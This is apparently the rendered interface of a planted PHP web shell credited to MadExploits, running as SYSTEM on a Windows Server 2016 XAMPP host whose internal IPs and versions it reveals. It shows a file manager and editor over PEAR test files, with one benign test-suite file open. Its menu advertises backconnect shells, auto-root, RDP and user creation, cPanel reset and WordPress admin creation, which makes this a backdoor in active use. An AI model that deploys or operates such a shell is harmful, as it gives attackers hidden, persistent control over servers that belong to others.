Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
Console_Getopt
[ DIR ]
drwxrwxrwx
Structures_Graph
[ DIR ]
drwxrwxrwx
XML_Util
[ DIR ]
drwxrwxrwx
beehiveforum082
[ DIR ]
drwxrwxrwx
emptyDir
[ DIR ]
drwxrwxrwx
kohana22
[ DIR ]
drwxrwxrwx
parseDir
[ DIR ]
drwxrwxrwx
parseFile
[ DIR ]
drwxrwxrwx
AllTests.php
3.97
KB
-rw-rw-rw-
PHP_CompatInfo_TestSuite_Bugs....
26.23
KB
-rw-rw-rw-
PHP_CompatInfo_TestSuite_Cli.p...
27.54
KB
-rw-rw-rw-
PHP_CompatInfo_TestSuite_Stand...
113.31
KB
-rw-rw-rw-
checkMax.php
1.29
KB
-rw-rw-rw-
sample_req6056.php
910
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AllTests.php
<?php /** * Test suite for PHP_CompatInfo * * PHP version 5 * * @category PHP * @package PHP_CompatInfo * @author Laurent Laville <pear@laurent-laville.org> * @license http://www.opensource.org/licenses/bsd-license.php BSD * @version CVS: $Id: AllTests.php,v 1.4 2008/07/22 20:27:11 farell Exp $ * @link http://pear.php.net/package/PHP_CompatInfo * @since File available since Release 1.6.0 */ if (!defined('PHPUnit_MAIN_METHOD')) { define('PHPUnit_MAIN_METHOD', 'PHP_CompatInfo_AllTests::main'); } require_once 'PHPUnit/Framework/TestSuite.php'; require_once 'PHPUnit/TextUI/TestRunner.php'; chdir(dirname(__FILE__)); require_once 'PEAR/Config.php'; require_once 'PHP_CompatInfo_TestSuite_Standard.php'; require_once 'PHP_CompatInfo_TestSuite_Bugs.php'; /** * Class for running all test suites for PHP_CompatInfo package. * * @category PHP * @package PHP_CompatInfo * @author Laurent Laville <pear@laurent-laville.org> * @license http://www.opensource.org/licenses/bsd-license.php BSD * @version Release: @package_version@ * @link http://pear.php.net/package/PHP_CompatInfo * @since File available since Release 1.6.0 */ class PHP_CompatInfo_AllTests { /** * Runs the test suite. * * @return void */ public static function main() { PHPUnit_TextUI_TestRunner::run(self::suite()); } /** * Adds the PHP_CompatInfo test suite. * * @return object the PHPUnit_Framework_TestSuite object */ public static function suite() { $suite = new PHPUnit_Framework_TestSuite('PHP_CompatInfo Test Suite'); $suite->addTestSuite('PHP_CompatInfo_TestSuite_Standard'); $suite->addTestSuite('PHP_CompatInfo_TestSuite_Bugs'); if (PHP_CompatInfo_AllTests::packageInstalled('Console_GetArgs', '1.3.3') && PHP_CompatInfo_AllTests::packageInstalled('Console_Table', '1.0.5')) { /* Add CLI test suite, only if packages below are installed on your system : - Console_GetArgs 1.3.3 or better - Console_Table 1.0.5 or better */ include_once 'PHP_CompatInfo_TestSuite_Cli.php'; $suite->addTestSuite('PHP_CompatInfo_TestSuite_Cli'); } return $suite; } /** * Check if a package is installed * * Simple function to check if a package is installed under user * or system PEAR installation. Minimal version and channel info are supported. * * @param string $name Package name * @param string $version (optional) The minimal version * that should be installed * @param string $channel (optional) The package channel distribution * @param string $user_file (optional) file to read PEAR user-defined * options from * @param string $system_file (optional) file to read PEAR system-wide * defaults from * * @static * @return bool * @since PEAR_Info version 1.6.0 (2005-01-03) * @see PEAR_Info::packageInstalled() */ public static function packageInstalled($name, $version = null, $channel = null, $user_file = '', $system_file = '') { $config =& PEAR_Config::singleton($user_file, $system_file); $reg =& $config->getRegistry(); if (is_null($version)) { return $reg->packageExists($name, $channel); } else { $info = &$reg->getPackage($name, $channel); if (is_object($info)) { $installed['version'] = $info->getVersion(); } else { $installed = $info; } return version_compare($version, $installed['version'], '<='); } } } if (PHPUnit_MAIN_METHOD == 'PHP_CompatInfo_AllTests::main') { PHP_CompatInfo_AllTests::main(); } ?>
Close